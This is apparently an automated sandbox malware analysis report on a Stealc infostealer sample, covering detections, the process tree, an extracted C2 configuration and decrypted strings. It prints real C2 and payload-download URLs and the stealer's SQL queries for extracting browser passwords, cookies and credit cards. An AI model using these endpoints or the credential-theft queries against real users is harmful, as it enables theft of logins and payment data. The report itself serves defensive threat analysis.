Edit tour

Windows Analysis Report
EbXj93v3bO.exe

Overview

General Information

Sample name:	EbXj93v3bO.exe renamed because original name is a hash value
Original sample name:	c3108cefdf629f631dbba54af7124abc.exe
Analysis ID:	1572828
MD5:	c3108cefdf629f631dbba54af7124abc
SHA1:	c9f7a200239da2e89ba8da6afae7fc87cf19537c
SHA256:	91171af67f002002c7845dfc79d87ebdf86badd5c5f91727d00405d5638ab841
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

EbXj93v3bO.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\EbXj93v3bO.exe" MD5: C3108CEFDF629F631DBBA54AF7124ABC)

BB02.tmp.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\BB02.tmp.exe" MD5: 3E5FC816D18B06CEFCB86A31AE9FE52E)

WerFault.exe (PID: 7404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 1292 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xc08:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000003.1744504522.0000000002520000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2071410267.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1410:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: BB02.tmp.exe PID: 7928	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: BB02.tmp.exe PID: 7928	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
1.3.BB02.tmp.exe.2520000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.BB02.tmp.exe.24e0e67.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.BB02.tmp.exe.24e0e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.3.BB02.tmp.exe.2520000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.BB02.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
1.2.BB02.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T00:02:08.868986+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49738	92.255.57.89	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T00:02:02.011974+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49735	172.67.179.207	443	TCP
2024-12-11T00:02:03.610287+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49737	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://92.255.57.89/45c616e921a794b8.phplL	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllv	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/lw	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	Avira URL Cloud: Label: malware
Source: http://92.255.57.89	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpwininit.exe	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php4	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php658(v	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpl	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/ew	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000001.00000003.1744504522.0000000002520000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Multi AV Scanner detection for submitted file

Source: EbXj93v3bO.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: EbXj93v3bO.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 26
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 12
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 20
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: 24
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetProcAddress
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: LoadLibraryA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: lstrcatA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: OpenEventA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateEventA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CloseHandle
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Sleep
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: VirtualFree
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetSystemInfo
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: VirtualAlloc
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HeapAlloc
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetComputerNameA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: lstrcpyA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetProcessHeap
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetCurrentProcess
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: lstrlenA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ExitProcess
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetSystemTime
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: advapi32.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: gdi32.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: user32.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: crypt32.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetUserNameA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateDCA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetDeviceCaps
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ReleaseDC
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sscanf
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: VMwareVMware
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HAL9TH
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: JohnDoe
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DISPLAY
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: http://92.255.57.89
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: /45c616e921a794b8.php
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: /697b92cb4e247842/
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: default
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetFileAttributesA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HeapFree
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetFileSize
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GlobalSize
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: IsWow64Process
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Process32Next
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetLocalTime
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: FreeLibrary
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetVolumeInformationA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Process32First
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetModuleFileNameA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DeleteFileA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: FindNextFileA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: LocalFree
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: FindClose
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: LocalAlloc
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetFileSizeEx
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ReadFile
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SetFilePointer
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: WriteFile
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateFileA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: FindFirstFileA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CopyFileA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: VirtualProtect
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetLastError
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: lstrcpynA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: MultiByteToWideChar
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GlobalFree
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: WideCharToMultiByte
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GlobalAlloc
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: OpenProcess
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: TerminateProcess
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetCurrentProcessId
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: gdiplus.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ole32.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: bcrypt.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: wininet.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: shell32.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: rstrtmgr.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SelectObject
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BitBlt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: DeleteObject
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateCompatibleDC
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdiplusStartup
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdiplusShutdown
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdipDisposeImage
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GdipFree
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CoUninitialize
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CoInitialize
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CoCreateInstance
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BCryptDecrypt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BCryptSetProperty
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BCryptDestroyKey
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetWindowRect
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetDesktopWindow
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetDC
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CloseWindow
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: wsprintfA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CharToOemW
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: wsprintfW
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RegQueryValueExA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RegEnumKeyExA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RegOpenKeyExA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RegCloseKey
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RegEnumValueA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: CryptUnprotectData
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SHGetFolderPathA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: ShellExecuteExA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: InternetOpenUrlA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: InternetConnectA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: InternetCloseHandle
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HttpSendRequestA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: HttpOpenRequestA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: InternetReadFile
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: InternetCrackUrlA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: StrCmpCA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: StrStrA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: StrCmpCW
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: PathMatchSpecA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RmStartSession
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RmRegisterResources
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RmGetList
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: RmEndSession
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_open
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_step
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_column_text
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_finalize
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_close
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: sqlite3_column_blob
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: encrypted_key
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: PATH
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: NSS_Init
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: NSS_Shutdown
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: PK11_FreeSlot
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: PK11_Authenticate
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: C:\ProgramData\
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: browser:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: profile:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: url:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: login:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: password:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Opera
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: OperaGX
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Network
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: cookies
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: .txt
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: TRUE
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: FALSE
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: autofill
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: history
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: cc
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: name:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: month:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: year:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: card:
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Cookies
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Login Data
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: Web Data
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: History
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: logins.json
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: formSubmitURL
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: usernameField
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: encryptedUsername
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: encryptedPassword
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: guid
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.3.BB02.tmp.exe.2520000.0.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
